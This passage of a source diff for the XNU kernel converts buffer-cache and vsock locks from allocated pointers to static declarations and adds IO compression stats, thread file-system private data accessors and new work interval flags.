CONFIG_IO_COMPRESSION_STATS */ }; #define v_mountedhere v_un.vu_mountedhere @@ -621,6 +624,19 @@ int vnode_isinuse_locked(vnode_t, int, int ); #endif /* BSD_KERNEL_PRIVATE */ +#if CONFIG_IO_COMPRESSION_STATS +/* + * update the IO compression stats tracked at block granularity + */ +int vnode_updateiocompressionblockstats(vnode_t vp, uint32_t size_bucket); + +/* + * update the IO compression stats tracked for the buffer + */ +int vnode_updateiocompressionbufferstats(vnode_t vp, uint64_t uncompressed_size, uint64_t compressed_size, uint32_t size_bucket, uint32_t compression_bucket); + +#endif /* CONFIG_IO_COMPRESSION_STATS */ + extern bool rootvp_is_ssd; #endif /* !_SYS_VNODE_INTERNAL_H_ */ diff --git a/bsd/sys/vsock_domain.h b/bsd/sys/vsock_domain.h index 48049016f..c38709f5b 100644 --- a/bsd/sys/vsock_domain.h +++ b/bsd/sys/vsock_domain.h @@ -56,11 +56,8 @@ struct vsockpcb { struct vsockpcbinfo { // PCB locking. - lck_attr_t *vsock_lock_attr; - lck_grp_t *vsock_lock_grp; - lck_grp_attr_t *vsock_lock_grp_attr; - lck_rw_t *all_lock; - lck_rw_t *bound_lock; + lck_rw_t all_lock; + lck_rw_t bound_lock; // PCB lists. TAILQ_HEAD(, vsockpcb) all; LIST_HEAD(, vsockpcb) bound; diff --git a/bsd/sys/work_interval.h b/bsd/sys/work_interval.h index 91567cf83..b4d04f87b 100644 --- a/bsd/sys/work_interval.h +++ b/bsd/sys/work_interval.h @@ -154,6 +154,10 @@ __BEGIN_DECLS /* Kernel-supplied flag: Work interval has been ignored by the kernel */ #define WORK_INTERVAL_FLAG_IGNORED (0x20) +/* Specifies that the work interval requests the system to provide just enough performance + * to be able to finish at the provided deadline and no sooner. */ +#define WORK_INTERVAL_FLAG_FINISH_AT_DEADLINE (0x40) + /* Flags to describe the interval flavor to the performance controller */ #define WORK_INTERVAL_TYPE_MASK (0xF0000000) #define WORK_INTERVAL_TYPE_DEFAULT (0x0 << 28) @@ -163,6 +167,7 @@ __BEGIN_DECLS #define WORK_INTERVAL_TYPE_CA_CLIENT (0x3 << 28) #define WORK_INTERVAL_TYPE_HID_DELIVERY (0x4 << 28) #define WORK_INTERVAL_TYPE_COREMEDIA (0x5 << 28) +#define WORK_INTERVAL_TYPE_ARKIT (0x6 << 28) #define WORK_INTERVAL_TYPE_LAST (0xF << 28) #ifndef KERNEL diff --git a/bsd/sys_private/kdebug_private.h b/bsd/sys_private/kdebug_private.h index 6444ea6f4..bab6520e7 100644 --- a/bsd/sys_private/kdebug_private.h +++ b/bsd/sys_private/kdebug_private.h @@ -196,9 +196,11 @@ __API_AVAILABLE(macos(10.15), ios(13), tvos(13), watchos(6)); #define MACH_BRIDGE_OBSV_RATE 0x7 /* out of range observed rates */ /* DBG_SKYWALK has same toplevel code as DBG_DLIL, so don't reuse subcodes */ +#define DBG_SKYWALK_ALWAYSON 0x10 #define DBG_SKYWALK_FLOWSWITCH 0x11 #define DBG_SKYWALK_NETIF 0x12 #define DBG_SKYWALK_CHANNEL 0x13 +#define DBG_SKYWALK_PACKET 0x14 #define PPT_TEST 0x01 #define PPT_JETSAM_HIWAT 0x02 diff --git a/bsd/tests/bsd_tests.c b/bsd/tests/bsd_tests.c index debde98cf..cdb70d821 100644 --- a/bsd/tests/bsd_tests.c +++ b/bsd/tests/bsd_tests.c @@ -69,6 +69,7 @@ struct xnupost_test bsd_post_tests[] = { #ifdef __arm64__ XNUPOST_TEST_CONFIG_BASIC(arm64_lock_test), #endif +#if !KASAN // #if defined(__arm__) || defined(__arm64__) XNUPOST_TEST_CONFIG_BASIC(pmap_test), #endif /* defined(__arm__) || defined(__arm64__) */ @@ -78,12 +79,15 @@ struct xnupost_test bsd_post_tests[] = { #if __ARM_PAN_AVAILABLE__ XNUPOST_TEST_CONFIG_BASIC(arm64_late_pan_test), #endif +#endif /* !KASAN */ XNUPOST_TEST_CONFIG_BASIC(kalloc_test), XNUPOST_TEST_CONFIG_BASIC(ipi_test), #if HAS_TWO_STAGE_SPR_LOCK XNUPOST_TEST_CONFIG_BASIC(arm64_spr_lock_test), #endif +#if !KASAN XNUPOST_TEST_CONFIG_BASIC(copyio_test), +#endif /* KASAN */ }; uint32_t bsd_post_tests_count = sizeof(bsd_post_tests) / sizeof(xnupost_test_data_t); diff --git a/bsd/vfs/kpi_vfs.c b/bsd/vfs/kpi_vfs.c index 0b4f7a628..3efc85736 100644 --- a/bsd/vfs/kpi_vfs.c +++ b/bsd/vfs/kpi_vfs.c @@ -145,7 +145,7 @@ static void xattrfile_setattr(vnode_t dvp, const char * basename, struct vnode_attr * vap, vfs_context_t ctx); #endif /* CONFIG_APPLEDOUBLE */ -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; static errno_t post_rename(vnode_t fdvp, vnode_t fvp, vnode_t tdvp, vnode_t tvp); @@ -1525,6 +1525,36 @@ vfs_context_bind(vfs_context_t ctx) return 0; } +int +vfs_set_thread_fs_private(uint8_t tag, uint64_t fs_private) +{ + struct uthread *ut; + + if (tag != FS_PRIVATE_TAG_APFS) { + return ENOTSUP; + } + + ut = get_bsdthread_info(current_thread()); + ut->t_fs_private = fs_private; + + return 0; +} + +int +vfs_get_thread_fs_private(uint8_t tag, uint64_t *fs_private) +{ + struct uthread *ut; + + if (tag != FS_PRIVATE_TAG_APFS) { + return ENOTSUP; + } + + ut = get_bsdthread_info(current_thread()); + *fs_private = ut->t_fs_private; + + return 0; +} + int vfs_isswapmount(mount_t mnt) { @@ -1567,9 +1597,9 @@ vfs_rootvnode(void) { int error; - lck_rw_lock_shared(rootvnode_rw_lock); + lck_rw_lock_shared(&rootvnode_rw_lock); error = vnode_get(rootvnode); - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); if (error) { return (vnode_t)0; } else { diff --git a/bsd/vfs/vfs_bio.c b/bsd/vfs/vfs_bio.c index 6f3b17ae6..b9bd4bb4c 100644 --- a/bsd/vfs/vfs_bio.c +++ b/bsd/vfs/vfs_bio.c @@ -167,12 +167,11 @@ static TAILQ_HEAD(bqueues, buf) bufqueues[BQUEUES]; static int needbuffer; static int need_iobuffer; -static lck_grp_t *buf_mtx_grp; -static lck_attr_t *buf_mtx_attr; -static lck_grp_attr_t *buf_mtx_grp_attr; -static lck_mtx_t *iobuffer_mtxp; -static lck_mtx_t *buf_mtxp; -static lck_mtx_t *buf_gc_callout; +static LCK_GRP_DECLARE(buf_mtx_grp, "buffer cache"); +static LCK_ATTR_DECLARE(buf_mtx_attr, 0, 0); +static LCK_MTX_DECLARE_ATTR(iobuffer_mtxp, &buf_mtx_grp, &buf_mtx_attr); +static LCK_MTX_DECLARE_ATTR(buf_mtx, &buf_mtx_grp, &buf_mtx_attr); +static LCK_MTX_DECLARE_ATTR(buf_gc_callout, &buf_mtx_grp, &buf_mtx_attr); static uint32_t buf_busycount; @@ -286,7 +285,7 @@ bremhash(buf_t bp) } /* - * buf_mtxp held. + * buf_mtx held. */ static __inline__ void bmovelaundry(buf_t bp) @@ -609,6 +608,21 @@ bufattr_ioscheduled(bufattr_t bap) return 0; } +void +bufattr_markexpeditedmeta(bufattr_t bap) +{ + SET(bap->ba_flags, BA_EXPEDITED_META_IO); +} + +int +bufattr_expeditedmeta(bufattr_t bap) +{ + if ((bap->ba_flags & BA_EXPEDITED_META_IO)) { + return 1; + } + return 0; +} + errno_t buf_error(buf_t bp) { @@ -896,7 +910,7 @@ buf_create_shadow_internal(buf_t bp, boolean_t force_copy, uintptr_t external_st } *(buf_t *)(&io_bp->b_orig) = bp; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); io_bp->b_lflags |= BL_SHADOW; io_bp->b_shadow = bp->b_shadow; @@ -910,7 +924,7 @@ buf_create_shadow_internal(buf_t bp, boolean_t force_copy, uintptr_t external_st bp->b_data_ref++; } #endif - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } else { if (external_storage) { #ifdef BUF_MAKE_PRIVATE @@ -956,7 +970,7 @@ buf_make_private(buf_t bp) bcopy((caddr_t)bp->b_datap, (caddr_t)my_buf.b_datap, bp->b_bcount); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); for (t_bp = bp->b_shadow; t_bp; t_bp = t_bp->b_shadow) { if (!ISSET(bp->b_lflags, BL_EXTERNAL)) { @@ -974,7 +988,7 @@ buf_make_private(buf_t bp) } if (ds_bp == NULL) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); buf_free_meta_store(&my_buf); @@ -991,7 +1005,7 @@ buf_make_private(buf_t bp) bp->b_data_ref = 0; bp->b_datap = my_buf.b_datap; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); KERNEL_DEBUG(0xbbbbc004 | DBG_FUNC_END, bp, bp->b_shadow_ref, 0, 0, 0); return 0; @@ -1529,10 +1543,10 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg) } for (i = 0; i < num_lists; i++) { - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); if (buf_iterprepare(vp, &local_iterblkhd, list[i].flag)) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); continue; } while (!LIST_EMPTY(&local_iterblkhd)) { @@ -1548,7 +1562,7 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg) } } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); retval = callout(bp, arg); @@ -1564,17 +1578,17 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg) if (bp) { buf_brelse(bp); } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); goto out; case BUF_CLAIMED_DONE: - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); goto out; } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); } /* while list has more nodes */ out: buf_itercomplete(vp, &local_iterblkhd, list[i].flag); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } /* for each list */ } /* buf_iterate */ @@ -1596,7 +1610,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) return 0; } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); for (;;) { if (must_rescan == 0) { @@ -1604,8 +1618,8 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) * the lists may not be empty, but all that's left at this * point are metadata or B_LOCKED buffers which are being * skipped... we know this because we made it through both - * the clean and dirty lists without dropping buf_mtxp... - * each time we drop buf_mtxp we bump "must_rescan" + * the clean and dirty lists without dropping buf_mtx... + * each time we drop buf_mtx we bump "must_rescan" */ break; } @@ -1642,7 +1656,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) if (error == EDEADLK) { /* * this buffer was marked B_LOCKED... - * we didn't drop buf_mtxp, so we + * we didn't drop buf_mtx, so we * we don't need to rescan */ continue; @@ -1650,7 +1664,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) if (error == EAGAIN) { /* * found a busy buffer... we blocked and - * dropped buf_mtxp, so we're going to + * dropped buf_mtx, so we're going to * need to rescan after this pass is completed */ must_rescan++; @@ -1662,10 +1676,10 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) */ buf_itercomplete(vp, &local_iterblkhd, VBI_CLEAN); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return error; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (bp->b_flags & B_LOCKED) { KERNEL_DEBUG(0xbbbbc038, bp, 0, 0, 0, 0); @@ -1675,10 +1689,10 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) SET(bp->b_flags, B_INVAL); buf_brelse(bp); - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); /* - * by dropping buf_mtxp, we allow new + * by dropping buf_mtx, we allow new * buffers to be added to the vnode list(s) * we'll have to rescan at least once more * if the queues aren't empty @@ -1717,7 +1731,7 @@ try_dirty_list: if (error == EDEADLK) { /* * this buffer was marked B_LOCKED... - * we didn't drop buf_mtxp, so we + * we didn't drop buf_mtx, so we * we don't need to rescan */ continue; @@ -1725,7 +1739,7 @@ try_dirty_list: if (error == EAGAIN) { /* * found a busy buffer... we blocked and - * dropped buf_mtxp, so we're going to + * dropped buf_mtx, so we're going to * need to rescan after this pass is completed */ must_rescan++; @@ -1737,10 +1751,10 @@ try_dirty_list: */ buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return error; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (bp->b_flags & B_LOCKED) { KERNEL_DEBUG(0xbbbbc038, bp, 0, 0, 1, 0); @@ -1755,9 +1769,9 @@ try_dirty_list: buf_brelse(bp); } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); /* - * by dropping buf_mtxp, we allow new + * by dropping buf_mtx, we allow new * buffers to be added to the vnode list(s) * we'll have to rescan at least once more * if the queues aren't empty @@ -1766,7 +1780,7 @@ try_dirty_list: } buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY); } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return 0; } @@ -1796,7 +1810,7 @@ buf_flushdirtyblks_skipinfo(vnode_t vp, int wait, int flags, const char *msg) lock_flags |= BAC_SKIP_NONLOCKED; } loop: - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); if (buf_iterprepare(vp, &local_iterblkhd, VBI_DIRTY) == 0) { while (!LIST_EMPTY(&local_iterblkhd)) { @@ -1823,7 +1837,7 @@ loop: } continue; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); bp->b_flags &= ~B_LOCKED; @@ -1838,11 +1852,11 @@ loop: } writes_issued++; - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); } buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY); } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (wait) { (void)vnode_waitforwrites(vp, 0, 0, 0, msg); @@ -1875,7 +1889,7 @@ loop: /* - * called with buf_mtxp held... + * called with buf_mtx held... * this lock protects the queue manipulation */ static int @@ -1891,7 +1905,7 @@ buf_iterprepare(vnode_t vp, struct buflists *iterheadp, int flags) while (vp->v_iterblkflags & VBI_ITER) { vp->v_iterblkflags |= VBI_ITERWANT; - msleep(&vp->v_iterblkflags, buf_mtxp, 0, "buf_iterprepare", NULL); + msleep(&vp->v_iterblkflags, &buf_mtx, 0, "buf_iterprepare", NULL); } if (LIST_EMPTY(listheadp)) { LIST_INIT(iterheadp); @@ -1907,7 +1921,7 @@ buf_iterprepare(vnode_t vp, struct buflists *iterheadp, int flags) } /* - * called with buf_mtxp held... + * called with buf_mtx held... * this lock protects the queue manipulation */ static void @@ -1982,7 +1996,7 @@ bremfree_locked(buf_t bp) /* * Associate a buffer with a vnode. - * buf_mtxp must be locked on entry + * buf_mtx must be locked on entry */ static void bgetvp_locked(vnode_t vp, buf_t bp) @@ -2004,7 +2018,7 @@ bgetvp_locked(vnode_t vp, buf_t bp) /* * Disassociate a buffer from a vnode. - * buf_mtxp must be locked on entry + * buf_mtx must be locked on entry */ static void brelvp_locked(buf_t bp) @@ -2033,7 +2047,7 @@ buf_reassign(buf_t bp, vnode_t newvp) printf("buf_reassign: NULL"); return; } - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); /* * Delete from old vnode list, if on one. @@ -2052,7 +2066,7 @@ buf_reassign(buf_t bp, vnode_t newvp) } bufinsvn(bp, listheadp); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } static __inline__ void @@ -2112,36 +2126,6 @@ bufinit(void) binsheadfree(bp, &iobufqueue, -1); } - /* - * allocate lock group attribute and group - */ - buf_mtx_grp_attr = lck_grp_attr_alloc_init(); - buf_mtx_grp = lck_grp_alloc_init("buffer cache", buf_mtx_grp_attr); - - /* - * allocate the lock attribute - */ - buf_mtx_attr = lck_attr_alloc_init(); - - /* - * allocate and initialize mutex's for the buffer and iobuffer pools - */ - buf_mtxp = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr); - iobuffer_mtxp = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr); - buf_gc_callout = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr); - - if (iobuffer_mtxp == NULL) { - panic("couldn't create iobuffer mutex"); - } - - if (buf_mtxp == NULL) { - panic("couldn't create buf mutex"); - } - - if (buf_gc_callout == NULL) { - panic("couldn't create buf_gc_callout mutex"); - } - /* * allocate and initialize cluster specific global locks... */ @@ -2540,7 +2524,7 @@ buf_brelse_shadow(buf_t bp) #endif int need_wakeup = 0; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); __IGNORE_WCASTALIGN(bp_head = (buf_t)bp->b_orig); @@ -2619,7 +2603,7 @@ buf_brelse_shadow(buf_t bp) need_wakeup = 1; } } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (need_wakeup) { wakeup(bp_head); @@ -2809,21 +2793,21 @@ buf_brelse(buf_t bp) */ buf_release_credentials(bp); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (bp->b_shadow_ref) { SET(bp->b_lflags, BL_WAITSHADOW); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return; } if (delayed_buf_free_meta_store == TRUE) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); finish_shadow_master: buf_free_meta_store(bp); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); } CLR(bp->b_flags, (B_META | B_ZALLOC | B_DELWRI | B_LOCKED | B_AGE | B_ASYNC | B_NOCACHE | B_FUA)); @@ -2855,12 +2839,12 @@ finish_shadow_master: bp->b_timestamp = buf_timestamp(); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); /* * the buf_brelse_shadow routine doesn't take 'ownership' * of the parent buf_t... it updates state that is protected by - * the buf_mtxp, and checks for BL_BUSY to determine whether to + * the buf_mtx, and checks for BL_BUSY to determine whether to * put the buf_t back on a free list. b_shadow_ref is protected * by the lock, and since we have not yet cleared B_BUSY, we need * to check it while holding the lock to insure that one of us @@ -2883,9 +2867,9 @@ finish_shadow_master: if (needbuffer) { /* * needbuffer is a global - * we're currently using buf_mtxp to protect it + * we're currently using buf_mtx to protect it * delay doing the actual wakeup until after - * we drop buf_mtxp + * we drop buf_mtx */ needbuffer = 0; need_wakeup = 1; @@ -2893,7 +2877,7 @@ finish_shadow_master: if (ISSET(bp->b_lflags, BL_WANTED)) { /* * delay the actual wakeup until after we - * clear BL_BUSY and we've dropped buf_mtxp + * clear BL_BUSY and we've dropped buf_mtx */ need_bp_wakeup = 1; } @@ -2903,7 +2887,7 @@ finish_shadow_master: CLR(bp->b_lflags, (BL_BUSY | BL_WANTED)); buf_busycount--; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (need_wakeup) { /* @@ -2936,14 +2920,14 @@ incore(vnode_t vp, daddr64_t blkno) dp = BUFHASH(vp, blkno); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (incore_locked(vp, blkno, dp)) { retval = TRUE; } else { retval = FALSE; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return retval; } @@ -2973,7 +2957,7 @@ buf_wait_for_shadow_io(vnode_t vp, daddr64_t blkno) dp = BUFHASH(vp, blkno); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); for (;;) { if ((bp = incore_locked(vp, blkno, dp)) == NULL) { @@ -2986,9 +2970,9 @@ buf_wait_for_shadow_io(vnode_t vp, daddr64_t blkno) SET(bp->b_lflags, BL_WANTED_REF); - (void) msleep(bp, buf_mtxp, PSPIN | (PRIBIO + 1), "buf_wait_for_shadow", NULL); + (void) msleep(bp, &buf_mtx, PSPIN | (PRIBIO + 1), "buf_wait_for_shadow", NULL); } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } /* XXX FIXME -- Update the comment to reflect the UBC changes (please) -- */ @@ -3020,7 +3004,7 @@ buf_getblk(vnode_t vp, daddr64_t blkno, int size, int slpflag, int slptimeo, int operation &= ~BLK_ONLYVALID; dp = BUFHASH(vp, blkno); start: - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if ((bp = incore_locked(vp, blkno, dp))) { /* @@ -3047,7 +3031,7 @@ start: KERNEL_DEBUG((FSDBG_CODE(DBG_FSRW, 396)) | DBG_FUNC_NONE, (uintptr_t)blkno, size, operation, 0, 0); - err = msleep(bp, buf_mtxp, slpflag | PDROP | (PRIBIO + 1), "buf_getblk", &ts); + err = msleep(bp, &buf_mtx, slpflag | PDROP | (PRIBIO + 1), "buf_getblk", &ts); /* * Callers who call with PCATCH or timeout are @@ -3080,7 +3064,7 @@ start: bremfree_locked(bp); bufstats.bufs_incore++; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); #ifdef JOE_DEBUG bp->b_owner = current_thread(); bp->b_tag = 1; @@ -3191,7 +3175,7 @@ start: int queue = BQ_EMPTY; /* Start with no preference */ if (ret_only_valid) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return NULL; } if ((vnode_isreg(vp) == 0) || (UBCINFOEXISTS(vp) == 0) /*|| (vnode_issystem(vp) == 1)*/) { @@ -3213,7 +3197,7 @@ start: SET(bp->b_flags, B_INVAL); binshash(bp, &invalhash); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); buf_brelse(bp); goto start; @@ -3241,7 +3225,7 @@ start: bgetvp_locked(vp, bp); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); allocbuf(bp, size); @@ -3251,11 +3235,11 @@ start: /* * buffer data is invalid... * - * I don't want to have to retake buf_mtxp, + * I don't want to have to retake buf_mtx, * so the miss and vmhits counters are done * with Atomic updates... all other counters * in bufstats are protected with either - * buf_mtxp or iobuffer_mtxp + * buf_mtx or iobuffer_mtxp */ OSAddAtomicLong(1, &bufstats.bufs_miss); break; @@ -3391,7 +3375,7 @@ buf_geteblk(int size) int queue = BQ_EMPTY; do { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); bp = getnewbuf(0, 0, &queue); } while (bp == NULL); @@ -3406,7 +3390,7 @@ buf_geteblk(int size) binshash(bp, &invalhash); bufstats.bufs_eblk++; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); allocbuf(bp, size); @@ -3439,7 +3423,7 @@ recycle_buf_from_pool(int nsize) buf_t bp; void *ptr = NULL; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); TAILQ_FOREACH(bp, &bufqueues[BQ_META], b_freelist) { if (ISSET(bp->b_flags, B_DELWRI) || bp->b_bufsize != (uint32_t)nsize) { @@ -3451,7 +3435,7 @@ recycle_buf_from_pool(int nsize) bcleanbuf(bp, TRUE); break; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return ptr; } @@ -3607,9 +3591,9 @@ allocbuf(buf_t bp, int size) * Remove the buffer from the hash. Return the buffer and the queue * on which it was found. * - * buf_mtxp is held upon entry - * returns with buf_mtxp locked if new buf available - * returns with buf_mtxp UNlocked if new buf NOT available + * buf_mtx is held upon entry + * returns with buf_mtx locked if new buf available + * returns with buf_mtx UNlocked if new buf NOT available */ static buf_t @@ -3677,7 +3661,7 @@ start: */ add_newbufs: - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); /* Create a new temporary buffer header */ bp = (struct buf *)zalloc(buf_hdr_zone); @@ -3690,7 +3674,7 @@ add_newbufs: SET(bp->b_flags, B_HDRALLOC); *queue = BQ_EMPTY; } - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (bp) { binshash(bp, &invalhash); @@ -3710,7 +3694,7 @@ add_newbufs: /* the hz value is 100; which leads to 10ms */ ts.tv_nsec = (slptimeo % 1000) * NSEC_PER_USEC * 1000 * 10; - msleep(&needbuffer, buf_mtxp, slpflag | PDROP | (PRIBIO + 1), "getnewbuf", &ts); + msleep(&needbuffer, &buf_mtx, slpflag | PDROP | (PRIBIO + 1), "getnewbuf", &ts); return NULL; } @@ -3793,8 +3777,8 @@ found: * Returns 1 if issued a buf_bawrite() to indicate * that the buffer is not ready. * - * buf_mtxp is held upon entry - * returns with buf_mtxp locked + * buf_mtx is held upon entry + * returns with buf_mtx locked */ int bcleanbuf(buf_t bp, boolean_t discard) @@ -3817,7 +3801,7 @@ bcleanbuf(buf_t bp, boolean_t discard) bmovelaundry(bp); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); wakeup(&bufqueues[BQ_LAUNDRY]); /* @@ -3825,7 +3809,7 @@ bcleanbuf(buf_t bp, boolean_t discard) */ (void)thread_block(THREAD_CONTINUE_NULL); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); return 1; } @@ -3848,7 +3832,7 @@ bcleanbuf(buf_t bp, boolean_t discard) brelvp_locked(bp); } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); BLISTNONE(bp); @@ -3862,7 +3846,7 @@ bcleanbuf(buf_t bp, boolean_t discard) /* If discarding, just move to the empty queue */ if (discard) { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); CLR(bp->b_flags, (B_META | B_ZALLOC | B_DELWRI | B_LOCKED | B_AGE | B_ASYNC | B_NOCACHE | B_FUA)); bp->b_whichq = BQ_EMPTY; binshash(bp, &invalhash); @@ -3898,7 +3882,7 @@ bcleanbuf(buf_t bp, boolean_t discard) bp->b_validoff = bp->b_validend = 0; bzero(&bp->b_attr, sizeof(struct bufattr)); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); } return 0; } @@ -3915,20 +3899,20 @@ buf_invalblkno(vnode_t vp, daddr64_t lblkno, int flags) dp = BUFHASH(vp, lblkno); relook: - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if ((bp = incore_locked(vp, lblkno, dp)) == (struct buf *)0) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return 0; } if (ISSET(bp->b_lflags, BL_BUSY)) { if (!ISSET(flags, BUF_WAIT)) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return EBUSY; } SET(bp->b_lflags, BL_WANTED); - error = msleep((caddr_t)bp, buf_mtxp, PDROP | (PRIBIO + 1), "buf_invalblkno", NULL); + error = msleep((caddr_t)bp, &buf_mtx, PDROP | (PRIBIO + 1), "buf_invalblkno", NULL); if (error) { return error; @@ -3943,7 +3927,7 @@ relook: bp->b_owner = current_thread(); bp->b_tag = 4; #endif - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); buf_brelse(bp); return 0; @@ -3955,12 +3939,12 @@ buf_drop(buf_t bp) { int need_wakeup = 0; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (ISSET(bp->b_lflags, BL_WANTED)) { /* * delay the actual wakeup until after we - * clear BL_BUSY and we've dropped buf_mtxp + * clear BL_BUSY and we've dropped buf_mtx */ need_wakeup = 1; } @@ -3974,7 +3958,7 @@ buf_drop(buf_t bp) CLR(bp->b_lflags, (BL_BUSY | BL_WANTED)); buf_busycount--; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (need_wakeup) { /* @@ -3990,11 +3974,11 @@ buf_acquire(buf_t bp, int flags, int slpflag, int slptimeo) { errno_t error; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); error = buf_acquire_locked(bp, flags, slpflag, slptimeo); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return error; } @@ -4029,7 +4013,7 @@ buf_acquire_locked(buf_t bp, int flags, int slpflag, int slptimeo) /* the hz value is 100; which leads to 10ms */ ts.tv_sec = (slptimeo / 100); ts.tv_nsec = (slptimeo % 100) * 10 * NSEC_PER_USEC * 1000; - error = msleep((caddr_t)bp, buf_mtxp, slpflag | (PRIBIO + 1), "buf_acquire", &ts); + error = msleep((caddr_t)bp, &buf_mtx, slpflag | (PRIBIO + 1), "buf_acquire", &ts); if (error) { return error; @@ -4058,14 +4042,14 @@ errno_t buf_biowait(buf_t bp) { while (!ISSET(bp->b_flags, B_DONE)) { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (!ISSET(bp->b_flags, B_DONE)) { DTRACE_IO1(wait__start, buf_t, bp); - (void) msleep(bp, buf_mtxp, PDROP | (PRIBIO + 1), "buf_biowait", NULL); + (void) msleep(bp, &buf_mtx, PDROP | (PRIBIO + 1), "buf_biowait", NULL); DTRACE_IO1(wait__done, buf_t, bp); } else { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } } /* check 